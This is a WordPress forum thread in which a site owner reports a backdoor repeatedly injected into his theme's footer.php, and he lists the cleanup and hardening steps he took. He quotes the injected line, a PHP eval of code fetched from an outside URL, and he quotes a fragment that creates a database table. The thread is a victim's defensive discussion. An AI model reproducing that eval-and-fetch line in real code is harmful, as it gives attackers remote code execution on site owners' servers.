WordPress.org

Forums

Injection in the Footer (9 posts)

  1. willrich33
    Member
    Posted 1 year ago #

    I believe twice I have had an PHP injection attack in the footer.php file...

    This is the pretty piece of work they put in:

    <?php eval( file_get_contents("http://www.ashburyhoa.org/thelinks.txt") ); ?>

    Anybody else, I would like to know.

    This might not be posted to the right forum!!!

  2. kmessinger
    Moderator
    Posted 1 year ago #

  3. willrich33
    Member
    Posted 1 year ago #

    This is the second time something has magically appeared in my footer. I am guessing it is related to a plugin. You are right, I went to the location and it was pretty harmless hack. Still someone has a way into my footer file. I guess maybe my facebook plugin hooks into wp_footer or something like that, I am not sure, I really not a WordPress guru.

    Thanks, Willy

  4. willrich33
    Member
    Posted 1 year ago #

    Update:

    This happened again, same link except the code had things like:

    if (!$exists) {
    $wpdb->query("CREATE TABLE wp_bannedip ( ipaddr VARCHAR(60) )");
    }

    Anybody else get hacked in the footer?

    Thx, Willy

  5. cubecolour
    ɹoʇɐɹǝpoɯ
    Posted 1 year ago #

    What is the URL of your site and which theme are you using?

  6. willrich33
    Member
    Posted 1 year ago #

    Thx cubecolour

    The theme is custom and the site is http://www.jewelheart.org.

    I am afraid to list my plugins...if you want take the conversation private my email is kwillrichardson at gmail.com

    I am planning on rebuilding the site to try close any back doors...I already cleaned up the database and I will check the media files tonite...

    Best, Willy

  7. willrich33
    Member
    Posted 1 year ago #

    cubecolour, kmessinger:

    I continue to work on hardening this site. I just want to publicly acknowledge that I found multiple Trojan-432 trojans in the server's email inboxes. And according to thread below, this Trojan may be targeted at Tibetan sympathizers.

    https://discussions.apple.com/thread/4940264

    So perhaps the attack is more sophisticated than it looks.

    Thanks, Willy

  8. kmessinger
    Moderator
    Posted 1 year ago #

    When rebuilding please upgrade to 3.8

  9. willrich33
    Member
    Posted 1 year ago #

    Thx, it was 3.8 and it happened again...

    These are the steps I took to try to fix the prob...

    1) Dropped all unused tables from database (you get these from trying plugins), including the table that this hack installed (scary!). Be careful doing this!

    2) Checked all media files to make sure there were no executable files in the media folders.

    3) Went through the site's plugins in the plugin folder and checked that there were no files out of date sync with other files (plugins typically overwrite everything on update so file dates for a plugin should be exactly the same)

    4) searched the theme in use for eval and base64 backwards and forwards...also searched for string reverse (strrev). Deleted themes twentyten, twentyeleven, and twentytwelve.

    5) Downloaded a fresh copy of WordPress, unzipped it, and copied wp-content from the current install into the fresh install. Uploaded it into a new directory and got the domain working right with these instructions http://codex.wordpress.org/Giving_WordPress_Its_Own_Directory

    If I didn't get I will be back to this post!!!!

    Thx, Willy

Topic Closed

This topic has been closed to new replies.

About this Topic